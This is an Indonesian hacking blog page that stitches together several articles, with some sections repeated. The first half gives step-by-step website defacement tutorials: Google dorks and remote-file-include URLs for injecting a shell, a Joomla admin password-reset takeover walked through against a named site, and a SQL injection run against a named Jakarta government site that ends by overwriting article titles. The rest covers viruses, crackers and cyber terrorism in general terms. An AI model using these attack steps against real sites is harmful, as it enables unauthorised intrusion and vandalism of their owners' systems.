Cara Mudah Deface Web Via RFI
15 September 2008
Penulis: Artikel · Kategori Artikel: Hacking, Vuln
Cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:
Hacked by Nama Kamu
Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy
Senin, 07 Desember 2009
Senayanbowling.com di-Deface?
Melakukan serangan Merusak tampilan website secara diam-diam (tanpa ijin pemiliknya) biasa dikenal dengan “Deface” , tentu saja hal ini termasuk mimpi buruk yang menakutkan bagi para pembuat/penjaga website seperti saya.
Saat mengembara didunia maya, saya menemukan salah satu website korban deface yaitu senayanbowling.com . Entah sejak kapan website ini di-Deface.. yang jelas sampai artikel ini ditulis . website buatan Rajasa ini masih menampilkan pesan dari crakers si-pelaku defacing dan sebuah gambar bertuliskan “Pertamax” yang mengingatkan saya pada trend postingan di sebuah forum terbesar Indonesia.
Waduhh, amit2x deh.. jangan sampai dehh website2x saya kena deface, soalnya hal ini pasti mempengaruhi kredibilitas saya. Belajar dari kesalahan orang lain, saya coba telusuri kemungkinan2x senayanbowling.com ini di-Deface.. Sehingga dikemudian hari saya bisa preventif terhadap serangan deface ini.
Beberapa hasil penelusuran saya terhadap kejadian deface pada senayanbowling , akhirnya saya menemukan beberapa celah pada website itu yang memang memungkinkan untuk diterobos masuk dan di deface.
Celah #1
CMS open-source yang tidak di upgrade
Menggunakan CMS sebagai engine pada website merupakan langkah tepat dalam proses web development, tapi jika CMS tersebut sudah kadaluarsa (tidak di-upgrade) maka langkah tepat tersebut tentu saja menjadi langkah yang kurang bijaksana.
Nahh, Senayanbowling itu menggunakan CMS open-source bernama Joomla , silakan cek pada:
http://www.senayanbowling.com/administrator
maka anda pasti mendapati back-end area yang berisi login box. Saya juga kurang tau persis versi berapa yang digunakan , tapi melihat layoutnya sihh sekitar 68% kemungkinan joomla yang digunakan versi 1.5.x
Namanya juga open-source , makanya setiap orang pasti bisa meng-explore tiap baris script code cms tersebut. sehingga perkembangan versi cms opensource ini sangat lah cepat. jika di temukan script code yang lemah atau berbahaya, maka langsung dipersiapkan versi perbaikannya (pacth/upgrade). makanya jika anda menggunakan cms opensource konsekuensinya yaa harus rajin2x upgrade ke versi terbaru.
Celah #2
URL joomla yang default bawaan pabrik
Celah berikutnya dari pengamatan saya terlihat dari URL halaman2x web-nya masih default bawaan pabrik. seperti berikut:
http://senayanbowling.com/index.php?option=com_content&view=article&id=44&Itemid=51
hal tersebut sangat memungkinkan seseorang yang menginjeksi URL tersebut dengan cara mengetikan sebuah parameter/ variable pada address bar dibrowsernya .. bahkan mungkin juga menciptakan query sql yang langsung menyerang sistem database. seremm bener..!
btw, untuk merubah URL tersebut (aliasing) pada Joomla anda bisa berkunjung kesini..
Selain aman.. penggunaan aliasing URL (dijoomla dikenal dengan nama SEF URL-Search Engine Friendly URL) ini sangat bagus untuk di-crawl oleh google.
Celah #3
Kemungkinan Username yang masih default (admin)
Pada saat install pertama kali joomla biasanya men-set username login administrator bernama “admin” . jika tidak diganti maka kemungkinan kombinasi login sudah pasti berkurang 50% , tinggal nebak passwordnya aja..
Nahh, cara dapetin passwordnya berkaitan dengan kemungkinan pada celah 1,2 dan 3 diatas adalah seperti ini :
Step #1
Karena urlnya tidak di-aliasing (celah #2) maka bisa dilakukan injeksi padafasilitas remote change password admin (token) dengan cara mengetikkan string diurl seperti ini :
http://www.senayanbowling.com/index.php?option=com_user&view=reset&layout=confirm
nanti akan keluar form isian field token dengan tombol submit :
Step #2
Disinilah terdapat celah#1 berupa kesalahan script code joomla yang kadaluarsa (belum di upgrade).
Masukkan karakter ” ‘ ” (kutip satu) di dalam field box tersebut , sehingga dapat memancing keluarnya form reset admin password
masukkan password terserah aja.. hal itu mengakibatkan tergantikan-nya password lama admin dengan password yang baru saja dimasukkan.
Step #3
Finishing step! Setelah merubah password admin , selanjutnya masuk pada bagian administrator back-end
http://www.senayanbowling.com/administrator
Jika kemungkinan celah #3 benar (username masih menggunakan “admin”) berarti tinggal masukkan kata: “admin” dikolom username dan password yang dirubah tadi pada kolom password.
Kalo sudah di taking over oleh cracker, harapan terakhir adalah mengambil alih lagi account administrator melalui cpanel / phpmyadmin di-hostingannya .
Semoga hal ini bisa menjadi pelajaran atau preventif bagi saya sendiri.
Thx, Salam buat orang rumah…
Share On :
Saat mengembara didunia maya, saya menemukan salah satu website korban deface yaitu senayanbowling.com . Entah sejak kapan website ini di-Deface.. yang jelas sampai artikel ini ditulis . website buatan Rajasa ini masih menampilkan pesan dari crakers si-pelaku defacing dan sebuah gambar bertuliskan “Pertamax” yang mengingatkan saya pada trend postingan di sebuah forum terbesar Indonesia.
Waduhh, amit2x deh.. jangan sampai dehh website2x saya kena deface, soalnya hal ini pasti mempengaruhi kredibilitas saya. Belajar dari kesalahan orang lain, saya coba telusuri kemungkinan2x senayanbowling.com ini di-Deface.. Sehingga dikemudian hari saya bisa preventif terhadap serangan deface ini.
Beberapa hasil penelusuran saya terhadap kejadian deface pada senayanbowling , akhirnya saya menemukan beberapa celah pada website itu yang memang memungkinkan untuk diterobos masuk dan di deface.
Celah #1
CMS open-source yang tidak di upgrade
Menggunakan CMS sebagai engine pada website merupakan langkah tepat dalam proses web development, tapi jika CMS tersebut sudah kadaluarsa (tidak di-upgrade) maka langkah tepat tersebut tentu saja menjadi langkah yang kurang bijaksana.
Nahh, Senayanbowling itu menggunakan CMS open-source bernama Joomla , silakan cek pada:
http://www.senayanbowling.com/administrator
maka anda pasti mendapati back-end area yang berisi login box. Saya juga kurang tau persis versi berapa yang digunakan , tapi melihat layoutnya sihh sekitar 68% kemungkinan joomla yang digunakan versi 1.5.x
Namanya juga open-source , makanya setiap orang pasti bisa meng-explore tiap baris script code cms tersebut. sehingga perkembangan versi cms opensource ini sangat lah cepat. jika di temukan script code yang lemah atau berbahaya, maka langsung dipersiapkan versi perbaikannya (pacth/upgrade). makanya jika anda menggunakan cms opensource konsekuensinya yaa harus rajin2x upgrade ke versi terbaru.
Celah #2
URL joomla yang default bawaan pabrik
Celah berikutnya dari pengamatan saya terlihat dari URL halaman2x web-nya masih default bawaan pabrik. seperti berikut:
http://senayanbowling.com/index.php?option=com_content&view=article&id=44&Itemid=51
hal tersebut sangat memungkinkan seseorang yang menginjeksi URL tersebut dengan cara mengetikan sebuah parameter/ variable pada address bar dibrowsernya .. bahkan mungkin juga menciptakan query sql yang langsung menyerang sistem database. seremm bener..!
btw, untuk merubah URL tersebut (aliasing) pada Joomla anda bisa berkunjung kesini..
Selain aman.. penggunaan aliasing URL (dijoomla dikenal dengan nama SEF URL-Search Engine Friendly URL) ini sangat bagus untuk di-crawl oleh google.
Celah #3
Kemungkinan Username yang masih default (admin)
Pada saat install pertama kali joomla biasanya men-set username login administrator bernama “admin” . jika tidak diganti maka kemungkinan kombinasi login sudah pasti berkurang 50% , tinggal nebak passwordnya aja..
Nahh, cara dapetin passwordnya berkaitan dengan kemungkinan pada celah 1,2 dan 3 diatas adalah seperti ini :
Step #1
Karena urlnya tidak di-aliasing (celah #2) maka bisa dilakukan injeksi padafasilitas remote change password admin (token) dengan cara mengetikkan string diurl seperti ini :
http://www.senayanbowling.com/index.php?option=com_user&view=reset&layout=confirm
nanti akan keluar form isian field token dengan tombol submit :
Step #2
Disinilah terdapat celah#1 berupa kesalahan script code joomla yang kadaluarsa (belum di upgrade).
Masukkan karakter ” ‘ ” (kutip satu) di dalam field box tersebut , sehingga dapat memancing keluarnya form reset admin password
masukkan password terserah aja.. hal itu mengakibatkan tergantikan-nya password lama admin dengan password yang baru saja dimasukkan.
Step #3
Finishing step! Setelah merubah password admin , selanjutnya masuk pada bagian administrator back-end
http://www.senayanbowling.com/administrator
Jika kemungkinan celah #3 benar (username masih menggunakan “admin”) berarti tinggal masukkan kata: “admin” dikolom username dan password yang dirubah tadi pada kolom password.
Kalo sudah di taking over oleh cracker, harapan terakhir adalah mengambil alih lagi account administrator melalui cpanel / phpmyadmin di-hostingannya .
Semoga hal ini bisa menjadi pelajaran atau preventif bagi saya sendiri.
Thx, Salam buat orang rumah…
Share On :
Deface dengan SQL Injection
Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe kek lagu aja yah…
yaudah gak papa kek lagu… yang penting gw tetap ganteng
Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan…
Webnya adalah…
http://pemakaman.jakarta.go.id/
hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102
untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′
Oooopppsss keknya terjadi error….
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’.
/artikel.asp, line 230
berarti bisa dipastikan klo website tersebut terkena bugs…
oke… ayo kita buat error lagi, sampe orgasme… loh!?
kali ini kita membuat error dengan : having 1=1;–
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ having 1=1;–
errornya seperti ini :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/artikel.asp, line 230
py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom
sekarang kita cari tau tabel berikutnya…
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;–
error lagi :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 230
sekarang kita dapat py_Naskah.category
berarti kitambah di urlnya
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–
error berikutnya :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 230
urlnya menjadi :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–
nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title
untuk merubahnya kita menggunakan cara berikut :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;–
Hasilnya
Oke that’s all
Good Luck
yaudah gak papa kek lagu… yang penting gw tetap ganteng
Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan…
Webnya adalah…
http://pemakaman.jakarta.go.id/
hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102
untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′
Oooopppsss keknya terjadi error….
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’.
/artikel.asp, line 230
berarti bisa dipastikan klo website tersebut terkena bugs…
oke… ayo kita buat error lagi, sampe orgasme… loh!?
kali ini kita membuat error dengan : having 1=1;–
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ having 1=1;–
errornya seperti ini :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/artikel.asp, line 230
py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom
sekarang kita cari tau tabel berikutnya…
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;–
error lagi :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 230
sekarang kita dapat py_Naskah.category
berarti kitambah di urlnya
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–
error berikutnya :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 230
urlnya menjadi :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–
nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title
untuk merubahnya kita menggunakan cara berikut :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;–
Hasilnya
Oke that’s all
Good Luck
Virus Sebagai Perusak Data
Virus komputer adalah bagian kecil program yang mengikatkan diri pada aplikasi atau file, di mana program tersebut bisa menyebabkan komputer bekerja di luar kehendak pemakai. Program ini disebut virus karena punya kesamaan ciri-ciri dengan virus dalam bidang biologi dan kesehatan. Persebaran virus komputer dianalogikan seperti persebaran virus dari satu orang ke orang lain. Virus ini hanya akan menyebar ketika program aplikasi virus atau file yang terkena virus tersebut dieksekusi. Karena sifat-sifat kerja virus yang bisa menyebabkan komputer bekerja di luar kehendak itulah maka virus ini juga banyak digunakan oleh hacker dan cracker untuk melakukan penyusupan ke suatu sistem.
Virus komputer dikategorikan berdasarkan cara penyebaran atau bagian yang diserang, antara lain Boot Sector Viruses (menyerang boot sector), File Viruses (menyerang file), Macro Viruses,(terletak pada program-program yang memakai makro seperti Microsoft seperti Word dan Excel), E-mail viruses (menyebar melalui e-mail), Stealth virus, Polymorphic virus (kodenya berubah setiap berpindah mesin), dan Multipartite virus (gabungan file virus dan boot sector virus). Virus komputer ini terletak pada program yang executable (*.com, *.bat, *.exe, *.dll, dan file-file executable yang lain).
Penanganan Virus
Kerusakan data yang disebabkan oleh virus bisa bermacam-macam. Ada virus yang melakukan penghapusan sebagian atau bahkan seluruh file, atau melakukan pengubahan kode-kode file tersebut. Ada juga virus yang melakukan perubahan nama atau ekstensi file sehingga pemilik data akan mengalami kesulitan untuk mencari datanya. Selain itu, ada juga virus yang menciptakan banyak file-file tak perlu sehingga menghabiskan kapasitas disk drive kita. Kebanyakan dari virus-virus ini menyerang file-file sistem dari sistem operasi yang digunakan. Dari hari ke hari, varians dari suatu virus semakin banyak tercipta, karena hanya dengan mengubah sedikit algoritma dari virus tersebut, maka virus tersebut sudah tidak dikenali oleh anti virus yang belum memiliki definisi virus varians baru tersebut.
Untuk mengatasi masalah virus pada komputer ini, biasanya kita menggunakan program Anti Virus. Prioritas utama dari program Anti Virus ini adalah untuk “membersihkan” file-file yang semula terinfeksi virus supaya bebas dari virus tersebut. Prioritas selanjutnya, seandainya file tersebut tidak bisa dibersihkan dari virus, maka Program Anti Virus akan mengusahakan supaya file-file yang terinfeksi tersebut tidak digunakan. Caranya dengan mengkarantina file tersebut. Tetapi seandainya file tersebut merupakan file vital, yang selalu dieksekusi ketika suatu program dijalankan, maka Program Anti Virus akan menyarankan untuk menghapus file tersebut supaya tidak terjadi penyebaran virus lebih lanjut
Virus komputer dikategorikan berdasarkan cara penyebaran atau bagian yang diserang, antara lain Boot Sector Viruses (menyerang boot sector), File Viruses (menyerang file), Macro Viruses,(terletak pada program-program yang memakai makro seperti Microsoft seperti Word dan Excel), E-mail viruses (menyebar melalui e-mail), Stealth virus, Polymorphic virus (kodenya berubah setiap berpindah mesin), dan Multipartite virus (gabungan file virus dan boot sector virus). Virus komputer ini terletak pada program yang executable (*.com, *.bat, *.exe, *.dll, dan file-file executable yang lain).
Penanganan Virus
Kerusakan data yang disebabkan oleh virus bisa bermacam-macam. Ada virus yang melakukan penghapusan sebagian atau bahkan seluruh file, atau melakukan pengubahan kode-kode file tersebut. Ada juga virus yang melakukan perubahan nama atau ekstensi file sehingga pemilik data akan mengalami kesulitan untuk mencari datanya. Selain itu, ada juga virus yang menciptakan banyak file-file tak perlu sehingga menghabiskan kapasitas disk drive kita. Kebanyakan dari virus-virus ini menyerang file-file sistem dari sistem operasi yang digunakan. Dari hari ke hari, varians dari suatu virus semakin banyak tercipta, karena hanya dengan mengubah sedikit algoritma dari virus tersebut, maka virus tersebut sudah tidak dikenali oleh anti virus yang belum memiliki definisi virus varians baru tersebut.
Untuk mengatasi masalah virus pada komputer ini, biasanya kita menggunakan program Anti Virus. Prioritas utama dari program Anti Virus ini adalah untuk “membersihkan” file-file yang semula terinfeksi virus supaya bebas dari virus tersebut. Prioritas selanjutnya, seandainya file tersebut tidak bisa dibersihkan dari virus, maka Program Anti Virus akan mengusahakan supaya file-file yang terinfeksi tersebut tidak digunakan. Caranya dengan mengkarantina file tersebut. Tetapi seandainya file tersebut merupakan file vital, yang selalu dieksekusi ketika suatu program dijalankan, maka Program Anti Virus akan menyarankan untuk menghapus file tersebut supaya tidak terjadi penyebaran virus lebih lanjut
Pengertian Cracker
Pembobol. Orang yang mampu menembus kode dan kode kunci (password) serta memecahkan sistem security tanpa izin atau secara tidak beretika. Istilah {cracker} telah ditemui oleh pengganggu sistem komputer untuk membedakan aktivititas penggunaan komputer yang melanggar aturan atau untuk memberikan istilah yang lebih berdasarkan aktivitasnya. Istilah ini juga membedakan {hacker} yang disebut sebagai seseorang yang mahir dalam menggunakan komputer beserta perintah-perintah dasarnya.
Prev: Jadilah Hacker, Bukan Cracker
Next: Local Area Network (LAN) Tanpa Kabel
Prev: Jadilah Hacker, Bukan Cracker
Next: Local Area Network (LAN) Tanpa Kabel
Pengertian Cracker
Pembobol. Orang yang mampu menembus kode dan kode kunci (password) serta memecahkan sistem security tanpa izin atau secara tidak beretika. Istilah {cracker} telah ditemui oleh pengganggu sistem komputer untuk membedakan aktivititas penggunaan komputer yang melanggar aturan atau untuk memberikan istilah yang lebih berdasarkan aktivitasnya. Istilah ini juga membedakan {hacker} yang disebut sebagai seseorang yang mahir dalam menggunakan komputer beserta perintah-perintah dasarnya.
Prev: Jadilah Hacker, Bukan Cracker
Next: Local Area Network (LAN) Tanpa Kabel
Prev: Jadilah Hacker, Bukan Cracker
Next: Local Area Network (LAN) Tanpa Kabel
CYBER TERRORISM (Sudah Siapkah Kita Menghadapinya?)
Oleh: Mayor Sus Ir. Rudy A.G. Gultom, M.Sc. *)
Perkembangan teknologi informasi yang sangat pesat merupakan kebutuhan pokok dalam
kehidupan manusia saat ini. Informasi yang didapat secara cepat, tepat dan akurat memainkan peranan sangat penting dalam berbagai aspek kehidupan manusia, seperti penentuan sebuah kebijaksanaan, sebagai alat bantu dalam proses pengambilan keputusan atau bahkan sebagai tren atau gaya hidup manusia modern. Kenyataannya semakin banyak kalangan bisnis, organisasi,perkantoran, pendidikan dan militer hingga individu yang menjadi sangat ketergantungan dengan fenomena zaman informasi ini. Sehingga munculah istilah yang sering dikenal dengan sebutan “the information age” atau abad informasi.
Pengertian Cyber Terrorism
Namun kenikmatan serta kemudahan yang ditawarkan abad informasi sekaligus mengundang para terorisme di dunia maya (cyber terrorism) untuk turut serta berpetualang didalamnya. Pengertian tentang cyber terrorism sebenarnya terdiri dari dua aspek yaitu cyber space dan terrorism, sementara para pelakunya disebut dengan cyber terrorists. Para hackers dan crackers juga dapat disebut dengan cyber terrorist, karena seringkali kegiatan yang mereka lakukan di dunia maya (Internet) dapat menteror serta menimbulkan kerugian yang besar terhadap korban yang menjadi targetnya, mirip seperti layaknya aksi terorisme. Keduanya mengeksploitasi dunia maya (internet) untuk kepentingannya masing-masing. Mungkin perbedaan tipis antara cyber terrorist dan hackers hanyalah pada motivasi dan tujuannya saja, dimana motivasi dari para cyber
terrorist adalah untuk kepentingan politik kelompok tertentu dengan tujuan memperlihatkan eksistensinya di panggung politik dunia. Sementara motivasi para hackers atau crackers adalah untuk memperlihatkan eksistensinya atau adu kepintaran untuk menunjukan superiotasnya di dunia maya dengan tujuan kepuasan tersendiri atau demi uang. Secara umum pengertian cyber terrorism adalah “suatu bentuk kegiatan terencana yang termotivasi secara politis yang berupa serangan terhadap informasi, sistim komputer, program komputer dan data sehingga engakibatkan kerugian besar serta jatuhnya korban tak berdosa yang dilakukan oleh satu
kelompok grup atau perorangan.”
Aksi Cyber Terrorism di Manca Negara
Berbagai potensi ancaman serius dapat ditimbulkan dari kegiatan para cyber terrorism, seperti melakukan serangan dan penetrasi terhadap sistim jaringan komputer serta infrastruktur telekomunikasi milik pemerintah, militer atau pihak lainnya yang dapat mengancam keselamatan kehidupan manusia. Beberapa contoh kegiatan cyber terrorist di manca negara antara lain, di Amerika Serikat, pada bulan Februari 1998 terjadi serangan (breaks-in or attack) sebanyak 60 kali perminggunya melalui media Internet terhadap 11 jaringan komputer militer di Pentagon. Dalam cyber attack ini yang menjadi target utama para cyber terrorist adalah Departemen Pertahanan Amerika Serikat (DoD). Di Srilanka, pada bulan Agustus 1997, sebuah organisasi yang bernama
the Internet Black Tigers yang berafiliasi kepada gerakan pemberontak Macan Tamil (the Liberation Tigers of Tamil Eelam) menyatakan bertanggung jawab atas kejahatan email (email bombing, email harrasment, email spoofing, etc.) yang menimpa beberapa kedutaan serta kantor perwakilan pemerintah Srilanka di manca negara. Tujuan akhirnya adalah kampanye untuk melepaskan diri dari Srilanka dalam memperjuangkan kemerdekaan rakyat Tamil. Di Cina, pada bulan Juli 1998, sebuah perkumpulan cyber terrorist atau crackers terkenal berhasil menerobos masuk ke pusat komputer sistim kendali satelit Cina dan berhasil mengacaukan “selama beberapa waktu” sistim kendali sebuah satelit milik Cina yang sedang mengorbit di ruang angkasa. Tujuan utama dari aksi ini adalah untuk melakukan protes terhadap gencarnya investasi negara barat di Cina. Di Swedia, pada bulan September 1998, pada saat kegiatan pemilihan umum, sejumlah cyber terrorist berhasil melakukan kegiatan sabotase yaitu merubah (defaced) tampilan website dari partai politik berhaluan kanan dan kiri. Dimana Website links partai politik tersebut dirubah tujuannya ke alamat situs-situs pornografi sehingga sangat merugikan partai karena kampanye partai secara elektronik melalui Internet menjadi terhambat. Di Indonesia sendiri, sekitar bulan Agustus 1997, cyber terrorist atau hackers dari Portugal pernah merubah (defacing) tampilan situs resmi dari Mabes ABRI (TNI), walaupun dengan segera dapat diantisipasi. Kemudian pada bulan April 2004 situs resmi milik KPU (Komisi Pemilihan Umum) jugu berhasil di hack dengan teknik defacing, namun dengan segera pelakunya yaitu seorang konsultan Teknologi Informasi suatu perusahaan di Jakarta dapat segera diamankan oleh pihak kepolisian. Namun sebenarnya masih banyak lagi
aktivitas para cyber terrorist di negara-negara lain yang masih berlangsung hingga saat ini.Beberapa analis menyatakan bahwa kegiatan cyber terrorism dewasa ini sudah dapat dikategorikan sebagai peperangan informasi berskala rendah (low-level information warfare) dimana dalam beberapa tahun mendatang mungkin sudah dianggap sebagai peperangan informasi yang sesungguhnya (the real information warfare). Seperti contoh pada saat perang Irak-AS,disana diperlihatkan bagaimana informasi telah diekploitasi sedemikian rupa mulai dari laporan peliputan TV, Radio sampai dengan penggunaan teknologi sistim informasi dalam cyber warfare untuk mendukung kepentingan komunikasi antar prajurit serta jalur komando dan kendali satuan tempur negara-negara koalisi dibawah pimpinan Amerika Serikat. Hal ini sudah dapat dikategorikan
sebagai aksi cyber warfare atau cyber information, dimana disinformasi serta kegiatan propaganda oleh pasukan koalisi menjadi salah satu bukti peruntuh moril pasukan Irak.
Cyber Terrorist dalam Sistim Jaringan Komputer
Berdasarkan hasil riset dan survey serta berbagai laporan tentang kejahatan komputer yang terjadi dewasa ini, diketahui bahwa saat ini tidak ada satupun jaringan komputer yang dapat diasumsikan 100% persen aman dari serangan virus komputer, spam, email bom dan sebagainya dari para hackers dan cyber terrorist. Seorang hacker atau cyber terrorist yang sudah berpengalaman dapat dengan mudah melakukan ‘breaks-in’ atau memasuki sistim jaringan komputer yang menjadi targetnya. Tidak perduli apakah didalam jaringan tersebut sudah mempunyai sistem pengamannya atau belum. Hal tersebut diperparah lagi dengan kenyataan
bahwa banyak sekali situs-situs bawah tanah (underground sites) dalam Internet yang menawarkan informasi serta pengetahuan tentang bagaimana menembus sebuah sistim jaringan komputer (penetrated) sekaligus mengelabui sistem pengamanannya (security compromised).
Informasi-informasi tersebut tersedia dalam bentuk kumpulan program, dokumentasi atau utiliti. Sehingga semakin memudahkan para cyber terrorist untuk melaksanakan niatnya terhadap target yang telah ditentukannya. Dengan memanfaatkan sistim informasi yang tersedia tersebut para cyberterrorist dapat menyampaikan “pesannya (messages)” ke seluruh dunia dengan cepat. Sudah berulangkali diadakan seminar, simposium serta diskusi-diskusi dengan topik utama mengenai pengamanan jaringan komputer. Banyak sekali pertanyaan yang sering bermunculan pada kesempatan tersebut, seperti: apakah jaringan komputer itu cukup aman?, apakah aman bila berbelanja lewat Internet tanpa khawatir seseorang mencuri informasi tentang kartu kredit kita?, apakah mungkin seseorang mengetahui password orang lain dan menggunakannnya tanpa
ketahuan?, dapatkah seseorang mencuri atau memanipulasi file-file orang lain?, dapatkah kita mempunyai sebuah jalur komunikasi yang aman di Internet? apa yang perlu dipelajari tentang sistim firewall, enkripsi, dekripsi, otentifikasi ? dsb. Untuk menjawab semua pertanyaan tersebut sangatlah tergantung dari tingkatan permasalahannya sendiri, yang sangat tergantung kepada setiap kasus yang terjadi. Tetapi yang jelas diperlukan adanya sistim pengamanan terhadap jaringan komputer yang tersedia.
Pengamanan jaringan komputer dahulu dan sekarang
Pada periode tahun ’70 an, jaringan komputer biasanya hanya terdapat di perusahaanperusahaan besar saja. Jaringan komputer tersebut saling menghubungkan setiap departemen dan setiap cabang ke sebuah pusat pengendalian (Central Control Point). Pada masa itu pengertian network security juga sudah ada, namun fokus utamanya hanya untuk kebutuhan para users didalam network itu sendiri (intranet) untuk meminimalkan tingkat resiko pengamanan (security risk). Pengetahuan serta informasi tentang bagaimana membobol sebuah jaringan komputer hanya diketahui oleh segelintir orang berprofesi khusus, seperti network consultant,
network administrator dan sebagainya. Sampai kemudian sebuah teknologi fenomenal bernama Internet muncul di tahun 1974, diprakarsai oleh Bob Taylor, direktur sebuah badan riset komputer Departemen Pertahanan Amerika (DoD/ Department of Defence) dalam sebuah proyek yang dinamakan ARPA (Advance
Research Project Agency). Pada awalnya proyek tersebut disiapkan untuk membangun jaringan komunikasi data antar pangkalan-pangkalan militer, beberapa universitas dan perusahaan yang tergabung dalam kontrak kerja dengan DoD. Saat ini, tiga dasarwarsa kemudian, jutaan pengguna diseluruh dunia sudah memanfaatkan teknologi tersebut. Namun selain membawa dampak yang sangat positif, Internet juga mempunyai dampak negatifnya. Seperti pengetahuan tentang membobol atau meng-crack satu jaringan komputer menjadi semakin maju. Materinya dapat diambil dari Internet lalu dipelajari bahkan langsung dipraktekkan, kebanyakan oleh para remaja dalam rangka “mencoba” ilmu yang telah didapatnya. Contohnya, hanya dengan mengetikkan kata hacking pada sebagian besar mesin pencari (search engine) seperti Yahoo, Google, Alta Vista,
Web Crawler dan sebagainya, setiap orang dapat dengan mudah mendapatkan informasi dan pengetahuan tentang hacking activities. Juga topik atau masalah yang dahulu diklasifikasikan rahasia atau sangat rahasia (top secret) seperti cara merakit bom atau bahan peledak atau merakit senjata api dan sebagainya sekarang bisa didapatkan di Internet hanya dengan meng “click” mouse di layar komputer.
